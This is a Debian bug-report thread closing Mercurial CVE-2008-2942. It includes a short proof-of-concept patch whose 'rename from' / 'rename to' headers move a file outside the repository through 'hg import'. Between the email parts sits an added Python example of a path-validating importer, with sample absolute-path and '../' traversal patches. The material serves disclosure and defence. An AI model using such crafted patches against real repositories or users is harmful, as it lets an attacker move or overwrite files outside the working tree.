Your message dated Tue, 01 Jul 2008 17:17:10 +0000
with message-id <[EMAIL PROTECTED]>
and subject line Bug#488628: fixed in mercurial 1.0.1-2
has caused the Debian Bug report #488628,
regarding mercurial: CVE-2008-2942 Insufficient input validation
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)
--
488628: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=488628
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: mercurial
Severity: grave
Tags: security, patch
Justification: user security hole
Hi
It is possible to rename arbitrary files, even outside
the repository by using a maliciously crafted patch.
Proof of concept:
echo quux > /tmp/foo
cat /tmp/foo /tmp/bar
quux
cat: /tmp/bar: No such file or directory
hg init hg-sandbox; cd hg-sandbox
hg import - <<EOF
> diff --git a/a b/b
> rename from /tmp/foo
> rename to /tmp/bar
> EOF
applying patch from stdin
/tmp/foo not tracked!
abort: /tmp/bar not under root
cat /tmp/foo /tmp/bar
cat: /tmp/foo: No such file or directory
quux
The issue has been fixed upstream[0].
Please upload with high urgency to make sure the fix reaches testing
soon.
Cheers
Steffen
[0]: http://www.selenic.com/hg/rev/87c704ac92d4
--- End Message ---
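The report above shows two distinct defects in the importer's handling of git-style rename headers: the source path is never checked against the repository root (it is only reported as "not tracked"), and the destination check ("not under root") fires only after the rename has already happened on disk. The following added example, written for this page and not Mercurial's own code, shows how an importer should handle such headers: parse the `rename from` / `rename to` pairs, resolve every path and reject anything absolute or escaping the root, require the source to be tracked, and only then touch the filesystem. The repository layout, the tracked-file set and the three sample patches are constructed for the demonstration; `apply_renames` and `resolve_under_root` are hypothetical names, not Mercurial APIs.

```python
import os
import re
import shutil
import tempfile

RENAME_FROM = re.compile(r"^rename from (.+)$")
RENAME_TO = re.compile(r"^rename to (.+)$")


class PatchPathError(ValueError):
    """Raised when a patch names a path the importer must not act on."""


def parse_renames(patch_text):
    """Extract (src, dst) pairs from git extended headers, in order."""
    pairs = []
    src = None
    for line in patch_text.splitlines():
        m = RENAME_FROM.match(line)
        if m:
            src = m.group(1)
            continue
        m = RENAME_TO.match(line)
        if m:
            if src is None:
                raise PatchPathError("rename to without rename from")
            pairs.append((src, m.group(1)))
            src = None
    return pairs


def resolve_under_root(root, path):
    """Return the absolute form of `path` only if it stays inside `root`.

    Absolute paths are refused outright; relative paths are resolved
    (symlinks and '..' included) and compared against the resolved root.
    """
    if os.path.isabs(path):
        raise PatchPathError(f"absolute path not allowed: {path}")
    root = os.path.realpath(root)
    full = os.path.realpath(os.path.join(root, path))
    if os.path.commonpath([root, full]) != root:
        raise PatchPathError(f"{path} not under root")
    return full


def apply_renames(root, patch_text, tracked):
    """Validate every rename in the patch first, then apply them.

    Nothing is moved until all checks pass, so a bad header anywhere in
    the patch leaves the working directory untouched.
    """
    plan = []
    for src, dst in parse_renames(patch_text):
        full_src = resolve_under_root(root, src)
        full_dst = resolve_under_root(root, dst)
        if src not in tracked:
            raise PatchPathError(f"{src} not tracked")
        plan.append((full_src, full_dst))
    for s, d in plan:  # only reached when every rename was accepted
        os.makedirs(os.path.dirname(d), exist_ok=True)
        os.rename(s, d)
    return plan


def demo():
    """Constructed scenario: a repo with one tracked file and a file outside it."""
    base = tempfile.mkdtemp()
    try:
        root = os.path.join(base, "hg-sandbox")
        os.makedirs(root)
        tracked = {"a"}
        with open(os.path.join(root, "a"), "w") as fh:
            fh.write("hello\n")
        outside = os.path.join(base, "foo")  # stands in for /tmp/foo in the report
        with open(outside, "w") as fh:
            fh.write("quux\n")
        # Same shape as the report's patch: absolute paths outside the repo.
        absolute = (f"diff --git a/a b/b\nrename from {outside}\n"
                    f"rename to {os.path.join(base, 'bar')}\n")
        # A tracked source, but a destination that climbs out of the root.
        traversal = "diff --git a/a b/b\nrename from a\nrename to ../escaped\n"
        # A legitimate rename that should succeed.
        benign = "diff --git a/a b/b\nrename from a\nrename to sub/b\n"
        results = {}
        for name, patch in (("absolute", absolute), ("traversal", traversal)):
            try:
                apply_renames(root, patch, tracked)
                results[name] = "applied"
            except PatchPathError as err:
                results[name] = str(err)
        results["outside_intact"] = (os.path.exists(outside)
                                     and not os.path.exists(os.path.join(base, "bar"))
                                     and not os.path.exists(os.path.join(base, "escaped")))
        apply_renames(root, benign, tracked)
        results["benign_moved"] = (os.path.exists(os.path.join(root, "sub", "b"))
                                   and not os.path.exists(os.path.join(root, "a")))
        return results
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The important ordering is that `resolve_under_root` runs for both ends of every rename before any `os.rename`, which is exactly what the report's transcript shows the vulnerable importer failing to do.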
--- Begin Message ---
Source: mercurial
Source-Version: 1.0.1-2
We believe that the bug you reported is fixed in the latest version of
mercurial, which is due to be installed in the Debian FTP archive:
mercurial-common_1.0.1-2_all.deb
to pool/main/m/mercurial/mercurial-common_1.0.1-2_all.deb
mercurial_1.0.1-2.diff.gz
to pool/main/m/mercurial/mercurial_1.0.1-2.diff.gz
mercurial_1.0.1-2.dsc
to pool/main/m/mercurial/mercurial_1.0.1-2.dsc
mercurial_1.0.1-2_i386.deb
to pool/main/m/mercurial/mercurial_1.0.1-2_i386.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Vincent Danjean <[EMAIL PROTECTED]> (supplier of updated mercurial package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.8
Date: Tue, 01 Jul 2008 18:44:19 +0200
Source: mercurial
Binary: mercurial mercurial-common
Architecture: all i386 source
Version: 1.0.1-2
Distribution: unstable
Urgency: high
Maintainer: Python Applications Packaging Team <[EMAIL PROTECTED]>
Changed-By: Vincent Danjean <[EMAIL PROTECTED]>
Closes: 488628
Description:
mercurial-common - Scalable distributed version control system (Common files)
mercurial - Scalable distributed version control system
Changes:
mercurial (1.0.1-2) unstable; urgency=high
.
* Backport from upstream: fix CVE-2008-2942 Insufficient input validation
(Closes: #488628)
Checksums-Sha1:
15dd2a0b24430f10282dd7250f4d569f9ba53896 473590 mercurial-common_1.0.1-2_all.deb
358c77522f811c98011c9ed48db704deb0715898 24446 mercurial_1.0.1-2.diff.gz
a690c4277429629815a02372f5ba79f76584679d 87662 mercurial_1.0.1-2_i386.deb
dbe4c192538ef2292be5f34764936c8fb192f4e5 1408 mercurial_1.0.1-2.dsc
Checksums-Sha256:
0f2c7db6dc74465caf73f585837a453a6c13a8b083963737413bcc9f75321c8a 87662 mercurial_1.0.1-2_i386.deb
abe5fdc94b5037acdae4fb5282577980a8955143ad64543a1c7ed787fadeafd5 473590 mercurial-common_1.0.1-2_all.deb
ddcf55cc023497968800e8e57d72c0e588dff84346befd135bf9c16e89da57e2 1408 mercurial_1.0.1-2.dsc
eac44d71cfcd6506033b420ecbec87648f649784e35072ca57ca9e5c2a14788c 24446 mercurial_1.0.1-2.diff.gz
Files:
592377138367f9e5cb63780329ecf699 87662 devel optional mercurial_1.0.1-2_i386.deb
90cce5e1bd6b1fc0a312a6edddf7bba7 473590 devel optional mercurial-common_1.0.1-2_all.deb
d250275bede624e89b9d2b73bcf8b0ef 24446 devel optional mercurial_1.0.1-2.diff.gz
eae9ac0a5e50c59dda514b9a46fc708b 1408 devel optional mercurial_1.0.1-2.dsc
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFIamPrC/d4Z50CXocRAoH3AKCDg2DcVK4r1hfnIYgdXYddrqsdeACgjFP1
Zcng3zNFnYpM0LbqDPNiVZE=
=x6AY
-----END PGP SIGNATURE-----
--- End Message ---